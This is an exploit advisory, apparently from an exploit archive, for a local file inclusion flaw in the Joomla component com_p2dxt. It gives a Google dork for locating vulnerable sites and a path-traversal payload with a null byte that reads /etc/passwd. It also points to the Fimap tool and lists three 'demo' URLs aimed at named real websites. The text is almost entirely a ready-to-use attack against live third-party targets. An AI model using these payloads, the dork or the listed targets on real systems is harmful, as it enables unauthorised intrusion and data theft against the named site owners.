id: 19836
date: 11/30/2012
title: Joomla Component com_p2dxt Local File Include Vulnerability
author: Zikou-16
cves: 

-------------------------------------------------------------------------------
          Joomla Component com_p2dxt Local File Include / LFI
 --------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"index.php?option=com_p2dxt"
#
#######################################################################################

#######################################################################################
# Exploit : 
#
# http://localhost/index.php?option=com_p2dxt&controller=../../../../etc/passwd%00
#
# note : you can use Fimap :)
#
######################################################################################

#######################################################################################
#
# Demo : 
#
#  1) http://www.praiseworks.biz/index.php?option=com_p2dxt&controller=../../etc/passwd%00
#
#  2) http://www.vti.edu.au/index.php?option=com_p2dxt&controller=../../../../etc/passwd%00
#  
#  3) http://www.geekplanetonline.com/index.php?option=com_p2dxt&controller=../../../../../etc/passwd%00
#                                     
#######################################################################################

#  0day.today [2023-03-26]  #